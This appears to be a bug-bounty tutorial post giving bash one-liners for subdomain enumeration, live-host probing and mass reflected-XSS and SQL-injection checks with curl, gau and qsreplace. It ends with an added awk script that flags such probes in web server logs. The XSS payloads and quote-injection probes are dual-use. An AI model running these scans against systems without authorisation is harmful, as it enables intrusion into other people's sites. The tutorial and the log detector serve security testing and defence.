
By x32x01
In the world of bug bounty and pentesting, speed and automation are everything. Bash one-liners allow you to combine tools and commands to automate recon and vulnerability hunting - without writing a full script.
Let's explore how to chain tools in one-liners to do recon, XSS, and SQLi detection from your terminal.
1. Subdomain Enumeration (Passive Recon)
Code:
# Run assetfinder once per line of domains.txt and collect the results
while IFS= read -r domain; do assetfinder --subs-only "$domain"; done < domains.txt >> all_subs.txt

- Uses assetfinder for passive subdomain discovery
- Loops through domains in domains.txt

2. Live Host Finder with httpx
Code:
# Probe every subdomain; responding hosts are printed with their status code and saved
httpx -l all_subs.txt -silent -status-code -threads 50 | tee live_hosts.txt

- Filters only active subdomains
- Shows HTTP status codes
- Stores in live_hosts.txt

3. Check for Reflected XSS in Params
Code:
# live_hosts.txt lines carry a status code after the URL, so keep only the first column
awk '{print $1}' live_hosts.txt | while IFS= read -r url; do curl -s "$url?search=<script>alert(1)</script>" | grep -qF "<script>alert(1)</script>" && echo "[XSS] $url"; done

- Appends a test payload
- Detects reflection of <script>alert(1)</script>
- Simple check for Reflected XSS

4. SQLi Vulnerability Tester with Curl + Grep
Code:
# Same URL column as above; a trailing ' is appended to the id parameter
awk '{print $1}' live_hosts.txt | while IFS= read -r url; do curl -s "$url?id=1'" | grep -qi "sql syntax" && echo "[SQLi] $url"; done

- Sends a ' to trigger SQL error
- Greps common SQL error response
- Detects potential SQLi endpoints

5. Parameter Discovery + XSS Test (with gau + qsreplace)
Code:
# Keep only URLs that have a query string, swap every value for the payload, then fetch each one
gau example.com | grep "=" | qsreplace '<svg/onload=alert(1)>' | while IFS= read -r url; do curl -s "$url" | grep -qF '<svg/onload=alert(1)>' && echo "[XSS] $url"; done

- Uses gau to extract URLs
- Replaces parameter values with XSS payload
- Tests each modified URL

6. Screenshot Live Hosts (Visual Recon)
Code:
# Feed the URL column of live_hosts.txt to gowitness on stdin
awk '{print $1}' live_hosts.txt | gowitness file -f - --threads 10

- Take screenshots of all live targets
- Fast and headless
- Great for visual recon

Tools Used:
- assetfinder - Subdomain Enumeration
- httpx - Host Liveness Detection
- curl - Manual Request Testing
- qsreplace - Replace query string values
- gau - Get All URLs (from Wayback, etc.)
- gowitness - Screenshot Tool

Install tools via:
Code:
go install github.com/tomnomnom/assetfinder@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/lc/gau@latest
go install github.com/tomnomnom/qsreplace@latest

Pro Tip:
Combine with tmux or watch to monitor in real-time. Use parallelization (xargs -P) for faster scans.

Final One-Liner Combo (All-in-One)
Code:
# Enumerate, keep live hosts, pull known URLs, inject the payload, report responses that reflect it
while IFS= read -r domain; do assetfinder --subs-only "$domain"; done < domains.txt | httpx -silent | tee live.txt | gau | grep "=" | qsreplace "'\"<script>alert(1)</script>" | while IFS= read -r url; do curl -s "$url" | grep -q "alert(1)" && echo "[Possible XSS] $url"; done

Fully automated passive recon + XSS detection using bash only.

Bug Bounty Impact:
Vulnerability: Reward Potential
Reflected XSS: $50 – $500
SQL Injection: $250 – $10,000+
Sensitive Info in Subdomains: $100 – $1000+
Recon-Only Findings (Takeover, Admin Panels): $50 – $1500

Start using Bash like a weapon - No GUI, no noise, just pure hacking from terminal.
Follow Hack Training for more real-world tactics!
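
The probes from steps 3 to 5 leave recognisable requests in a web server's access log. The script below is an added example, not part of the original post, showing how they can be flagged on the receiving side; the function names, the constructed sample log and the two match patterns are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: flag requests shaped like the XSS/SQLi probes above in an access log.

# Constructed sample (combined log format, documentation IP ranges).
sample_log() {
cat <<'EOF'
203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /?search=<script>alert(1)</script> HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /?id=1' HTTP/1.1" 500 231 "-" "curl/8.5.0"
203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "GET /item?q=%3Csvg%2Fonload%3Dalert%281%29%3E HTTP/1.1" 200 900 "-" "curl/8.5.0"
198.51.100.23 - - [10/Mar/2025:10:00:04 +0000] "GET /?search=shoes HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2025:10:00:05 +0000] "GET /profile?name=O'Brien HTTP/1.1" 200 733 "-" "Mozilla/5.0"
EOF
}

# Reads a log on stdin, prints "ip<TAB>tag<TAB>request-target" per flagged line.
# Assumes the request line holds no raw double quote (clients normally send %22).
flag_probes() {
  awk -F'"' -v sq="'" '
    {
      split($1, head, " "); ip = head[1]
      split($2, req, " "); target = tolower(req[2])
      q = index(target, "?"); if (q == 0) next
      query = substr(target, q + 1); tag = ""
      # <script or <svg in the query string, raw or percent-encoded
      if (query ~ /(<|%3c)(script|svg)/) tag = "xss-probe"
      # a parameter value that ends in a lone single quote, raw or as %27
      else if (query ~ ("=[^&]*(" sq "|%27)(&|$)")) tag = "sqli-probe"
      if (tag != "") printf "%s\t%s\t%s\n", ip, tag, req[2]
    }'
}

# Sources with at least $1 flagged requests (default 2), printed as "ip count".
noisy_sources() {
  flag_probes | awk -F'\t' -v min="${1:-2}" '
    { n[$1]++ }
    END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }' | sort
}

sample_log | flag_probes
```

A quote inside a value, as in name=O'Brien, is not flagged; only a value that ends in the quote is, which is the shape the id=1' probe produces.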

